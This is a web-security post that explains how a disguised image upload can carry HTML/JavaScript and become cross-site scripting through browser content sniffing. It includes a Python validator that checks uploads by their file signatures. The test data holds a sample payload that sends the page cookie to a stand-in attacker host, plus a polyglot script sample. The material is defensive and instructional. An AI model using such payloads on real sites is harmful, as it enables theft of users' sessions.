XSS attack via unchecked image uploads

If you allow users of your website to upload data (e.g. images) and display it to other users, you need to open the file on the server and examine its contents to check that it really is what it claims to be (e.g. an image). The filename extension alone proves nothing.

Most website software needs to examine the image anyway, to generate thumbnails, determine width/height, etc., in which case this check comes for free. But I’ve seen software with no such needs, where no server-side examination is done at all.

The reason is:

  • An uploading user (the attacker) may upload a file such as “xxx.jpg” whose contents are in fact HTML/JavaScript rather than an image
  • The web server will serve this file with the .jpg extension in the URL and Content-Type: image/jpeg, however…
  • Internet Explorer may, under some circumstances, ignore both of these pieces of information and instead inspect the bytes of the file to work out (“sniff”) what type of content it contains
  • Even if nothing bad happens while the file is loaded through an <img> tag, if the viewing user right-clicks and views the image in its own window, the data will be interpreted as HTML/JavaScript
  • The script then runs in the site’s own origin, so it can read the viewing user’s cookies, look into forms in other windows, etc., because the HTML/JavaScript appears to have been served by the site the viewing user is visiting
  • Through e.g. <img> tags (whose requests are not restricted by the same-origin policy) the file can send GET requests to an external site and exfiltrate this cookie and form information
  • Thus the attacker’s external site now has the cookie/form information, and the attacker can use it to impersonate the user at the site.
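As an added illustration (not code from the original post), here is a server-side check of the kind recommended above, in Python. It ignores the filename and extension entirely, looks at the leading bytes for a real image signature, and additionally refuses files whose first few hundred bytes contain HTML markup, which is what a content-sniffing browser would key on. The signature table, the 512-byte window, the list of markers and the sample uploads (including a "xxx.jpg" that is really an HTML page stealing document.cookie via an image request, as in the list above) are assumptions constructed for this example, not taken from any particular browser or library.

```python
"""Validate an uploaded "image" by its bytes, never by its name (example, stdlib only)."""
import re
from typing import Optional, Tuple

# Magic-byte signatures for the formats this hypothetical upload handler accepts.
IMAGE_SIGNATURES = {
    "image/jpeg": [b"\xff\xd8\xff"],
    "image/png": [b"\x89PNG\r\n\x1a\n"],
    "image/gif": [b"GIF87a", b"GIF89a"],
}

# Tags of the kind a browser's content sniffer treats as evidence of HTML.
# The list is an assumption for this example, not any browser's exact list.
HTML_MARKERS = re.compile(
    rb"<(?:!--|\s*/?\s*(?:!doctype|html|head|body|script|iframe|div|font|table|style|title)\b)",
    re.IGNORECASE,
)

# Sniffers decide on the first few hundred bytes; 512 is an assumed window.
SNIFF_WINDOW = 512


def detect_image_type(data: bytes) -> Optional[str]:
    """Return the MIME type whose signature the bytes start with, or None."""
    for mime, signatures in IMAGE_SIGNATURES.items():
        if any(data.startswith(sig) for sig in signatures):
            return mime
    return None


def looks_like_html(data: bytes) -> bool:
    """True if HTML markup appears within the sniffing window at the start of the file."""
    return HTML_MARKERS.search(data[:SNIFF_WINDOW]) is not None


def check_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason-or-detected-type). `filename` is deliberately unused:
    the extension is attacker-controlled and tells us nothing about the bytes."""
    detected = detect_image_type(data)
    if detected is None:
        return False, "bytes do not start with a known image signature"
    if looks_like_html(data):
        # Defence in depth: a valid image header followed by markup is still suspicious.
        return False, f"{detected} signature but HTML markup in the first {SNIFF_WINDOW} bytes"
    # Serve the file under the type we detected, not the name the client chose.
    return True, detected


# Constructed sample uploads for this example.
ATTACK_UPLOAD = (  # "xxx.jpg" whose body is an HTML page that leaks the cookie via an image request
    b"<html><body><script>"
    b"new Image().src='http://attacker.example/?c='+encodeURIComponent(document.cookie);"
    b"</script></body></html>"
)
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"\x00" * 64  # minimal JPEG-looking header
POLYGLOT = REAL_JPEG + b"<script>alert(1)</script>"  # image signature with markup tucked behind it


if __name__ == "__main__":
    for name, blob in [("xxx.jpg", ATTACK_UPLOAD), ("photo.jpg", REAL_JPEG), ("poly.jpg", POLYGLOT)]:
        print(name, check_upload(name, blob))
```

The check should run on the bytes the server actually stores and serves, after any upload-library handling, and the stored file should be served with the type detected here rather than one derived from the client's filename. Beyond what the post covers: modern browsers honour an `X-Content-Type-Options: nosniff` response header that disables this kind of sniffing, which is a cheap second layer, but it does not replace examining the file on the server.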

I was unaware of this before @ch2500 brought this to my attention, thanks! More information.